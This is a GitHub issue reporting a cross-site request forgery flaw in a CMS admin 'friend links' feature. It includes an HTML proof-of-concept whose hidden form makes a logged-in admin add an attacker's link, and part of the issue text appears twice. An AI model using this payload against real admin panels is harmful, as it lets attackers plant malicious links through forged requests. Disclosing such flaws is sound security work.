We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
just use add friend links for example:
After the admin logged in, we can send him a url with these code on that page
PoC:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:9000/admin.php/links/save" method="POST"> <input type="hidden" name="name" value="test" /> <input type="hidden" name="url" value="http://www.google.com" /> <input type="hidden" name="cid" value="1" /> <input type="hidden" name="pic" value="http://" /> <input type="hidden" name="sid" value="1" /> <input type="hidden" name="id" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html>
after he clicked that button, then we can add our malicious link to the friend link:
admin page:
homepage:
The text was updated successfully, but these errors were encountered:
No branches or pull requests
just use add friend links for example:
After the admin logged in, we can send him a url with these code on that page
PoC:
after he clicked that button, then we can add our malicious link to the friend link:
admin page:
homepage:
The text was updated successfully, but these errors were encountered: